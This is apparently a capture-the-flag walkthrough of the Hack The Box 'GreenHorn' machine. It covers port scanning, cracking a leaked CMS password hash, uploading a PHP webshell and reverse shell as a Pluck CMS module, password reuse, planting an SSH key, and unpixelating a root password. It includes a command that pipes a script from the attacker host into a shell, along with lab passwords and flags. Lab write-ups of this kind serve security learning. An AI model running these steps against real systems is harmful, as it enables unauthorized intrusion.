GreenHorn

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.25:22
Open 10.10.11.25:80
Open 10.10.11.25:3000
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.10.11.25
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-27 10:48 UTC
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:48
Completed NSE at 10:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:48
Completed NSE at 10:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:48
Completed NSE at 10:48, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 10:48
Completed Parallel DNS resolution of 1 host. at 10:48, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:48
Scanning 10.10.11.25 [3 ports]
Discovered open port 22/tcp on 10.10.11.25
Discovered open port 80/tcp on 10.10.11.25
Discovered open port 3000/tcp on 10.10.11.25
Completed Connect Scan at 10:48, 0.08s elapsed (3 total ports)
Initiating Service scan at 10:48
Scanning 3 services on 10.10.11.25
Completed Service scan at 10:49, 89.61s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.11.25.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 2.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 1.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 0.00s elapsed
Nmap scan report for 10.10.11.25
Host is up, received user-set (0.080s latency).
Scanned at 2024-07-27 10:48:08 UTC for 93s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 57d6928a7244841729eb5cc9636afefd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOp+cK9ugCW282Gw6Rqe+Yz+5fOGcZzYi8cmlGmFdFAjI1347tnkKumDGK1qJnJ1hj68bmzOONz/x1CMeZjnKMw=
|   256 40ea17b1b6c53f4256674a3cee75232f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEZQbCc8u6r2CVboxEesTZTMmZnMuEidK9zNjkD2RGEv
80/tcp   open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://greenhorn.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  ppp?    syn-ack
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=990489ab98123f7b; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=fwFi5uwa3lU9ZQXtWqC1OnPyCmQ6MTcyMjA3NzI5NTIxNDAyMzcxNg; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 27 Jul 2024 10:48:15 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=87a3c177f411b5cf; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=_NxYdqAX8yPx9AhcIdBo6_J5BCE6MTcyMjA3NzMwMDczOTY4OTg4Mw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 27 Jul 2024 10:48:20 GMT
|_    Content-Length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:49
Completed NSE at 10:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.42 seconds

Note: Port 3000 didn't show up on first scan with RustScan! Double check the open ports!!

└─$ grep green /etc/hosts
10.10.11.25     greenhorn.htb

HTTP (80) [Enumeration]

Writeup.png

Access to /data/modules is denied and to get into CMS we need admin password...

LFI is blocked because of ../ and nothing interesting without password.

Enumerate files/directories:

└─$ feroxbuster -u http://greenhorn.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,txt
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://greenhorn.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
...
200      GET        1l        4w       48c http://greenhorn.htb/data/index.html
200      GET        1l        4w       51c http://greenhorn.htb/data/inc/index.html
200      GET        1l        4w       54c http://greenhorn.htb/data/inc/lib/index.html
200      GET        1l        5w       27c http://greenhorn.htb/data/themes/default/license.txt
200      GET        1l       12w    16118c http://greenhorn.htb/data/image/favicon.ico
200      GET        2l       26w      149c http://greenhorn.htb/docs/update.php
200      GET        2l     5449w   363860c http://greenhorn.htb/data/modules/tinymce/tinymce.min.js
200      GET        3l        6w       47c http://greenhorn.htb/robots.txt
200      GET       19l       36w      295c http://greenhorn.htb/data/themes/.htaccess
200      GET       19l       36w      295c http://greenhorn.htb/images/.htaccess
200      GET       19l       38w      321c http://greenhorn.htb/files/.htaccess
200      GET       20l       38w      322c http://greenhorn.htb/data/trash/files/.htaccess
200      GET       31l      103w     1242c http://greenhorn.htb/login.php
200      GET       41l      266w     1811c http://greenhorn.htb/docs/README
200      GET      124l      384w     4417c http://greenhorn.htb/install.php
200      GET      124l      388w     4408c http://greenhorn.htb/admin.php
200      GET      452l      799w     7310c http://greenhorn.htb/data/styleadmin.css
200      GET      504l     4372w    26441c http://greenhorn.htb/data/modules/tinymce/license.txt
200      GET     1474l    20676w   138844c http://greenhorn.htb/data/modules/tinymce/changelog.txt
403      GET        7l       10w      162c http://greenhorn.htb/data/image/
403      GET        7l       10w      162c http://greenhorn.htb/data/modules/
403      GET        7l       10w      162c http://greenhorn.htb/data/modules/tinymce/
...
[####################] - 6m    326274/326274  0s      found:12196   errors:446
[####################] - 2m     14184/14184   98/s    http://greenhorn.htb/
[####################] - 2m     14184/14184   99/s    http://greenhorn.htb/data/
[####################] - 2m     14184/14184   98/s    http://greenhorn.htb/docs/
[####################] - 3m     14184/14184   87/s    http://greenhorn.htb/data/image/
[####################] - 3m     14184/14184   86/s    http://greenhorn.htb/data/modules/
[####################] - 3m     14184/14184   86/s    http://greenhorn.htb/data/modules/tinymce/
[####################] - 3m     14184/14184   79/s    http://greenhorn.htb/data/modules/albums/
[####################] - 3m     14184/14184   77/s    http://greenhorn.htb/data/modules/blog/
[####################] - 3m     14184/14184   76/s    http://greenhorn.htb/files/
[####################] - 3m     14184/14184   74/s    http://greenhorn.htb/images/
[####################] - 3m     14184/14184   77/s    http://greenhorn.htb/data/inc/
[####################] - 3m     14184/14184   75/s    http://greenhorn.htb/data/image/menu/
[####################] - 3m     14184/14184   76/s    http://greenhorn.htb/data/settings/
[####################] - 3m     14184/14184   69/s    http://greenhorn.htb/data/themes/
[####################] - 3m     14184/14184   71/s    http://greenhorn.htb/data/trash/
[####################] - 3m     14184/14184   71/s    http://greenhorn.htb/data/inc/lang/
[####################] - 3m     14184/14184   71/s    http://greenhorn.htb/data/inc/lib/
[####################] - 3m     14184/14184   78/s    http://greenhorn.htb/data/themes/default/
[####################] - 3m     14184/14184   81/s    http://greenhorn.htb/data/trash/files/
[####################] - 3m     14184/14184   85/s    http://greenhorn.htb/data/trash/images/
[####################] - 3m     14184/14184   87/s    http://greenhorn.htb/data/settings/modules/
[####################] - 3m     14184/14184   91/s    http://greenhorn.htb/data/settings/pages/
[####################] - 2m     14184/14184   101/s   http://greenhorn.htb/data/trash/pages/

DNS enumeration also returned nothing.

Gitea (3000)

There's a Gitea instance running

Writeup-1.png

On register page we can Register with OpenID and by the looks of it it's able to make requests:

Writeup-2.png

Gitea creds: test02@test02.test02:test02:test02test02

The webapp on port 80 is open sourced:

Writeup-3.png
└─$ git clone http://greenhorn.htb:3000/GreenAdmin/GreenHorn.git
└─$ cd GreenHorn
└─$ grep 'password' . -Rain | grep -vE 'js|/lang/'
./data/inc/functions.admin.php:356: * Hashes and saves login password.
./data/inc/functions.admin.php:360: * @param string $password The password (plain text).
./data/inc/functions.admin.php:362:function save_password($password) {
./data/inc/functions.admin.php:363:     //MD5-hash password
./data/inc/functions.admin.php:364:     $password = hash('sha512', $password);
./data/inc/functions.admin.php:365:     //Save password
./data/inc/functions.admin.php:366:     save_file('data/settings/pass.php', array('ww' => $password));
./data/inc/changepass.php:19:   //Include old password.
./data/inc/changepass.php:22:   //SHA512-encrypt posted passwords.
./data/inc/changepass.php:26:   //Check if the old password entered is correct. If it isnt, do:
./data/inc/changepass.php:36:   //If the old password entered is correct, save it.
./data/inc/changepass.php:38:                   save_password($cont2);
./data/inc/changepass.php:59:           <input name="cont1" id="cont1" type="password"/>
./data/inc/changepass.php:63:           <input name="cont2" id="cont2" type="password" />
./data/inc/changepass.php:67:           <input name="cont3" id="cont3" type="password" />
./data/inc/options.php:28:showmenudiv($lang['changepass']['title'], $lang['options']['pass_descr'], 'data/image/password.png', '?action=changepass');
./data/inc/header.php:151:                                      'img'  => 'data/image/password.png',
grep: (standard input): binary file matches
└─$ cat data/settings/pass.php
<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>
Writeup-4.png

Admin password: iloveyou1

HTTP (80) [Exploitation]

Now that we are able to login we are able to upload stuff on server

Options > Manage modules > Install modules

Writeup-5.png
└─$ cp /opt/scripts/shells/p0wny-shell/shell.php .
└─$ zip -r shell.zip shell.php
  adding: shell.php (deflated 76%)

Note: Zip name is module name in /data/modules and filename is just filename.

Access the webshell:

Writeup-6.png

ugh.... as always HTB does cronjob and deletes anything uploaded within a minute.

Just upload straight up reverse shell and get connection:

└─$ zip -r rev.zip php-reverse-shell.php
  adding: php-reverse-shell.php (deflated 59%)

Reverse Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

I wanted some database connection string to leak password, but Pluck CMS doesn't use it:

└─$ grep 'sql' . -Rain | grep -vE 'js|/lang/'
./requirements.php:98:          'text'  => '<strong>magic_quotes_gpc</strong> is turned on. pluck does not use MySQL, so it should be turned off for performance reasons.',

Service does seem to be online

www-data@greenhorn:/home/junior$ ss -tulnp
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp   UNCONN 0      0      127.0.0.53%lo:53        0.0.0.0:*
udp   UNCONN 0      0            0.0.0.0:68        0.0.0.0:*
tcp   LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*
tcp   LISTEN 0      511          0.0.0.0:80        0.0.0.0:*    users:(("nginx",pid=4141,fd=6),("nginx",pid=4140,fd=6))
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*
tcp   LISTEN 0      4096   127.0.0.53%lo:53        0.0.0.0:*
tcp   LISTEN 0      4096               *:3000            *:*
tcp   LISTEN 0      128             [::]:22           [::]:*

Enumerate system with linpeas

www-data@greenhorn:/dev/shm$ curl 10.10.14.37/lp.sh|sh|tee lp.log
...
                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
...
git         1108  0.5  4.4 2354588 178252 ?      Ssl  09:20   0:41 /usr/local/bin/gitea web --config /etc/gitea/app.ini
root        1113  0.0  0.0   6896  2904 ?        Ss   09:20   0:00 /usr/sbin/cron -f -P
root        1117  0.0  0.1  10348  4044 ?        S    09:20   0:00  _ /usr/sbin/CRON -f -P
root        1125  0.0  0.0   2892  1000 ?        Ss   09:20   0:00      _ /bin/sh -c /root/restart.sh
root        1126  0.0  0.0   7496  3680 ?        S    09:20   0:01          _ /bin/bash /root/restart.sh
root       13161  0.0  0.0   5772  1000 ?        S    11:22   0:00              _ /usr/bin/sleep 10 
...
mysql       1172  0.1  2.7 1541800 109312 ?      Ssl  09:20   0:10 /usr/sbin/mariadbd
  └─(Caps) 0x0000000020004002=cap_dac_override,cap_ipc_lock,cap_audit_write
root        4139  0.0  0.0  55228  1712 ?        Ss   10:15   0:00 nginx: master process /usr/sbin/nginx -g daemon[0m on; master_process on;
www-data    4140  0.5  0.2  58248  9180 ?        S    10:15   0:22  _ nginx: worker process
www-data    4141  0.8  0.2  57852  8772 ?        S    10:15   0:33  _ nginx: worker process
junior      8228  0.0  0.2  17096  9428 ?        Ss   10:53   0:00 /lib/systemd/systemd --user
junior      8229  0.0  0.0 103512  3668 ?        S    10:53   0:00  _ (sd-pam)

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
1.4M -rwxr-xr-x 1 root   root   1.4M Mar 14 11:31 /bin/bash
   0 lrwxrwxrwx 1 root   root      4 Mar 23  2022 /bin/sh -> dash
...
132M -rwxrwxrwx 1 junior junior 132M Apr 16 03:44 /usr/local/bin/gitea
...
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/gitea.service is calling this writable executable: /usr/local/bin/gitea
/etc/systemd/system/multi-user.target.wants/gitea.service is calling this writable executable: /usr/local/bin/gitea
/etc/systemd/system/multi-user.target.wants/grub-common.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/systemd-networkd.service could be executing some relative path
/etc/systemd/system/sleep.target.wants/grub-common.service could be executing some relative path
You cant write on systemd PATH
...

We are unable to read the file and only root or git group can read them.

www-data@greenhorn:/dev/shm$ cat /etc/gitea/app.ini
cat: /etc/gitea/app.ini: Permission denied
www-data@greenhorn:/dev/shm$ ls -alhd /etc/gitea/
drwxrwx--- 2 root git 4.0K Jun 20 06:36 /etc/gitea/

Anyway, not really interesting so far without junior user

SSH

Privilege Escalation (junior)

Using the password we found in Pluck CMS we can login as junior!

www-data@greenhorn:/dev/shm$ su - junior
Password: iloveyou1
junior@greenhorn:~$
---
└─$ ssh junior@greenhorn.htb
junior@greenhorn.htb: Permission denied (publickey).

SSH doesn't allow login via password.

└─$ ssh-keygen -f id_rsa
Generating public/private ed25519 key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:caUM9RIew6Maxdah5LZ6LquNJkbQZz+xrUp+gAxquTg woyag@kraken
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ5/HEwZN0ztb1G+B9PtxxKSzOv3Kk1J/L5jO0DBA07E woyag@kraken
---
junior@greenhorn:~/.ssh$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ5/HEwZN0ztb1G+B9PtxxKSzOv3Kk1J/L5jO0DBA07E woyag@kraken' >> /home/junior/.ssh/authorized_keys
---
└─$ ssh junior@greenhorn.htb -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Jul 27 01:26:16 PM UTC 2024

  System load:  0.0               Processes:             253
  Usage of /:   71.6% of 3.45GB   Users logged in:       1
  Memory usage: 22%               IPv4 address for eth0: 10.10.11.25
  Swap usage:   0%


This system is built by the Bento project by Chef Software
More information can be found at https://github.com/chef/bento
Last login: Sat Jul 27 11:03:21 2024 from 10.10.14.154
junior@greenhorn:~$

User.txt

junior@greenhorn:~$ cat user.txt
f4b0a4affecc320188460a037558f9ae

Privilege Escalation (root)

junior@greenhorn:~$ python3 -m http.server 4444
---
└─$ curl greenhorn.htb:4444/openvas.pdf -sO
└─$ curl 'greenhorn.htb:4444/Using%20OpenVAS.pdf' -sO

pdf files seem to be the same...

└─$ diff openvas.pdf Using%20OpenVAS.pdf
Writeup-7.png

The password is pixelated image and no PDF manipulation can uncover it, we can extract it and try to reverse the process.

This New Tool Can Retrieve Pixelated Text from Redacted Documents

Dan Petro, a lead researcher at offensive security firm Bishop Fox, has demonstrated a new open-source tool called Unredacter to reconstruct text from the pixelated images, effectively leaking the very information that was meant to be protected.The tool is also seen as an improvement over an existing utility named Depix, which works by looking up what permutations of pixels could have resulted in certain pixelated blocks to recover the text.

The blog above introduces new tool called unredacter, Official post: Never, Ever, Ever Use Pixelation for Redacting Text

I was not able to get any valid results with the project, so I resorted to Depix tool.

➜ py depix.py -p ..\openvas.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o output.png
output.png

The most of the text is somewhat readable now!

Root password: sidefromsidetheothersidesidefromsidetheotherside

junior@greenhorn:~$ su
Password: sidefromsidetheothersidesidefromsidetheotherside

root@greenhorn:/home/junior# cd
cd
root@greenhorn:~# ls -alh
ls -alh
total 44K
drwx------  5 root root 4.0K Jul 27 16:18 .
drwxr-xr-x 20 root root 4.0K Jun 20 07:06 ..
lrwxrwxrwx  1 root root    9 Jun 11 14:42 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Oct 15  2021 .bashrc
drwx------  2 root root 4.0K Jun 20 06:36 .cache
-rwxr-xr-x  1 root root  250 Jun 19 17:06 cleanup.sh
drwxr-xr-x  3 root root 4.0K Jun 20 06:36 .local
lrwxrwxrwx  1 root root    9 Jun 20 05:44 .mysql_history -> /dev/null
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rwxr-xr-x  1 root root  962 Jul 18 13:01 restart.sh
-rw-r-----  1 root root   33 Jul 27 16:18 root.txt
-rw-r--r--  1 root root   66 Jul 18 12:59 .selected_editor
drwx------  2 root root 4.0K Jun 20 06:36 .ssh

Root.txt

root@greenhorn:~# cat root.txt
978b78ae10d821ec830fa9b167e87d13

Root Scripts

root@greenhorn:~# cat restart.sh
#!/bin/bash

# Define the target URL
url="http://greenhorn.htb/?file=welcome-to-greenhorn"

# Infinite loop
while true; do

    # Sleep for 10 seconds
    /usr/bin/sleep 10

    # Perform the curl request and check for the text "Failed to daemonise."
    response=$(/usr/bin/curl -s "$url")

    if echo "$response" | /usr/bin/grep -q "Failed to daemonise."; then
        # Suppress grep and rm output
        /usr/bin/grep -rl "Failed to daemonise." /var/www/html/pluck/data/modules | /usr/bin/xargs /usr/bin/rm -f >/dev/null 2>&1
    fi

    # Check the HTTP status code of the URL with a timeout of 10 seconds
    status_code=$(/usr/bin/curl -s -o /dev/null -w "%{http_code}" --max-time 10 "$url")

    if [ "$status_code" -ne 200 ]; then
        # Print message and restart nginx service
        echo "HTTP status code is $status_code or the request timed out. Restarting nginx service."
        /usr/bin/systemctl restart nginx
    fi
done >/dev/null 2>&1

root@greenhorn:~# cat cleanup.sh
#!/bin/bash

TARGET_DIR="/var/www/html/pluck/data/modules/"

# Find and delete directories modified in the last 3 minutes, excluding the target directory itself
find "$TARGET_DIR" -maxdepth 1 -mmin -3 -type d ! -path "$TARGET_DIR" -exec rm -rf {} \;
PreviousFormulaXNextHeadless

Last updated